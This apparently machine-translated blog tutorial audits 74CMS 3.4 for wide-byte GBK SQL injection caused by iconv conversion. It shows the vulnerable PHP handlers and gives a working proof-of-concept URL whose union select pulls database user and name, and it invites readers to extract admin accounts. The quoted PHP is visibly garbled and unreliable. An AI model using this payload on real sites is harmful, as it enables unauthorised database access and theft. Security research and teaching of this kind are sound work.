"PHP code Audit" Those years we dug together SQL injection-5. Global protection bypass wide byte injection

0x01 background

First we understand the next wide-byte injection, which stems from the programmer setting the MySQL connection with an error configured as: Set CHARACTER_SET_CLIENT=GBK, which causes an injection vulnerability caused by the encoding conversion. The specific principle is as follows:
1. Normally when GPC turns on or uses the Addslashes function to filter get or post-submitted parameters, the single quotation mark used by the hacker will be escaped as: \ ';
2. However, if there is wide-byte injection, we enter%df%27 first through the above-mentioned single-quote escape into%df%5c%27 (%5c is a backslash \), and then before the database query because GBK multibyte encoding is used, that is, in the Chinese character coding range of two bytes will be encoded as a Chinese character. Then the MySQL server will GBK code the query statement is%df%5c converted to the Chinese character "" (Note: GBK Chinese character coding range see appendix), and single quotes escaped, resulting in an injection vulnerability.
The MySQL connection is now basically configured as "set Character_set_client=binary" to solve this problem, so this article will describe the injection problem that occurs in PHP because of the character encoding conversion.
The loophole comes from dark clouds: http://www.wooyun.org/bugs/wooyun-2014-063219

0X02 Environment Construction

Look at the background we used the lower version of the 74CMS program, version 3.4 (20140310)
① Source online can search, I packed a copy: Http://pan.baidu.com/s/1c1mLCru
② Extract to www 74cms (20140310) directory, browser access to Http://localhost/74cms (20140310)), and then follow the prompts step by step installation, installation encountered problems please Baidu or Google, after successful visit such as:

0X03 Vulnerability Analysis

PART1: Source Structure

The structure of the source code is clear, should be the most clear audit structure, mainly has the following three pieces of content:

Index.php introduced the common.inc.php file, we followed common.inc.php, found the function of processing GPC:

<?php if (! Empty ($_get)) { $_get = addslashes_deep ($_get); } if (! Empty ($_post)) { $_post = addslashes_deep ($_post); } $_cookie = Addslashes_deep ($_cookie); $_request = Addslashes_deep ($_request); ?>

As you can see, the server handles the variables for Get and POST requests as addslashes processing.
and 74cms to prevent wide-byte injection, set the MySQL connection to binary read, configured in/include/mysql.class.php:

<?php functionConnect($dbhost,$dbuser,$DBPW,$dbname =‘‘,$dbcharset =' GBK ',$connect =1) { $func =Empty$connect)?' Mysql_pconnect ':' Mysql_connect '; if (!$this->linkid = @$func ($dbhost,$dbuser,$DBPW,true)) { $this->dbshow (' Can not connect to mysql! '); }else { if ($this->dbversion () >' 4.1 ') { mysql_query ("SET NAMES GBK"); if ( $this->dbversion () > ' 5.0.1 ') { mysql_query ( $this- LinkId); //character_set_client=binary binary mode Mysql_ Query ( "SET character_set_connection=". $dbcharset. $dbcharset. $this->linkid); ... ?>

Let's take a look at what happens to the use of the Iconv function in PHP.

Part2: Audit process

Injection One analysis:
1. At the/plus/ajax_user.php Registration office:

ElseIf$act = =' Do_reg ') { $captcha = Get_cache (' Captcha '); if ($captcha [' Verify_userreg '] = ="1") { $postcaptcha =$_post[' Postcaptcha ']; if ($captcha [' Captcha_lang '] = ="CN" && strcasecmp (Qishi_dbcharset,"UTF8")! =0) { $postcaptcha = Iconv ("Utf-8", Qishi_dbcharset,$postcaptcha); } if (Empty$postcaptcha) | |Empty$_session[' Imagecaptcha_content ']) | | STRCASECMP ($_session[' Imagecaptcha_content '],$postcaptcha)! =0) { Exit"Err"); } } Require_once (Qishi_root_path.' include/fun_user.php '); $username =Isset$_post[' username '])? Trim$_post[' username ']):Exit"Err"); $password =Isset$_post[' Password '])? Trim$_post[' Password ']):Exit"Err"); $member _type =Isset$_post[' Member_type '])? Intval ($_post[' Member_type ']):Exit"Err"); $email =Isset$_post[' Email ')? Trim$_post[ ' email ') : exit ( "err"); if (strcasecmp (Qishi_dbcharset, "UTF8")! = 0) { //to the registered name Utf-8 to GBK encoding conversion $username = Iconv ( "Utf-8", Qishi_dbcharset, $ username); $password = Iconv ( $password); $register = User_register ( $username, $password, $member _type, $email); /span>

Here we think of the word "Kam", its utf-8 code is E98CA6, its GBK code is e55c, and the above mentioned backslash \ exactly 5c.
So if we set username to: Kam ', first through the addlashes function or GPC to the single-quote escape to: Kam \ ', and then register here will go through the Icnov function will be "kam" into GBK code, and finally:%e5%5c%5c%27. The backslash is escaped (%5c%5c), thereby escaping the single quotation mark to cause an injection vulnerability.

2. We continue to follow up $register=user_register ($username, $password, $member _type, $email);
Here's the User_register function, in/include/fun_user.php:

Check the completion level of your CV Registered Members functionUser_register($username,$password,$member _type=0,$email,$uc _reg=true) { Global $db,$timestamp,$_cfg,$online _ip,$QS _pwdhash; $member _type=intval ($member _type); //Here is to use the Get_user_inusername function to determine whether the user name already exists, we follow up $ck _username=get_user_inusername ($username); $ck _email=get_user_inemail ($email); ... ... return $insert _id; }

3. Continue to follow the Get_user_inusername function in/include/fun_user.php:

Get_user_inusername($username) { $db; Bring in query, can inject ~ "SELECT * from". Table (' members ')."where username = ' {$username} ' LIMIT 1"; }

Injection Two analysis:
In the plus/ajax_street.php:

ElseIf$act = =' Key ') { $key = Trim ($_get[' key ']); if (!Empty$key)) { if (strcasecmp (Qishi_dbcharset,"UTF8")! =0) Utf-8 to GBK encoded conversion of parameter key $key = Iconv ("Utf-8", Qishi_dbcharset,$key); Brought into the query, you can inject $result =$db->query ("SELECT * from". Table' Category ')."Where c_alias= ' Qs_street ' and c_name like '%{$key}% '"); Output the query results to a page that can be echoed while ($row =$db->fetch_array ($result)) { if ($listtype = ="Li") { $htm. ="<li title=\" {$row [' c_name ']}\ ' id=\ ' {$row [' c_id ']}\ ' >{$row [' c_name ']}</li> '; }else { $_get[' Streetid '] =$row [' c_id ']; $url = Url_rewrite ( ' Qs_street ', $_get); $htm. = "<li><a href=\" {$url}\ "title=\" {$ row[' c_note ']}\ "class=\" vtip\ ">{$row [' c_name ']}</a><span>{$row [' Stat_jobs ']}</span></ Li> "; }; if (empty ( $htm)) { $htm = "<span class=\" noinfo\ "> No keyword found: <span>{$key}</span> Related roads! </span> "; exit ( $htm); } /span>

Here the analysis finds that the page returns the results of the query and constructs some union query statements to get the sensitive information of the database.

0x04 Vulnerability Proof

We use inject two (with Echo) to do the proof
found that the 74CMS category table has 9 fields, so construct a POC that gets the database user and related information:

http://localhost/74cms(20140310)/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,user(),5,6,7,database(),9%23

View the SQL statement found in the query statement that the backslash was shifted, and the single quotation mark escaped successfully:

Finally, interested students can continue to get information about other related fields such as admin account.

The Chinese character coding range of the attached GBK:

The Chinese character area includes:
A. GB 2312 Kanji area. namely GBK/2: B0a1-f7fe. Contains 6,763 GB of 2312 Kanji, arranged in the original order.
B. GB 13000.1 expands the Chinese character area. Including:
(1) GBK/3:8140-a0fe. Contains 6,080 CJK kanji in GB 13000.1.
(2) GBK/4: aa40-fea0. CJK Chinese characters and supplemental kanji are included in 8,160. CJK Chinese characters in the front, by the UCS code size, the addition of Chinese characters (including radicals and components) in the following, according to the "Kangxi Dictionary" page number/word rank.

As you can see, the two characters in the GBK encoding are a Chinese character, and the first character needs to be greater than 128.

Original link: http://www.cnbraid.com/2016/02/28/sql4/, please contact the author if you need to reprint.

"PHP code Audit" Those years we dug together SQL injection-5. Global protection bypass wide byte injection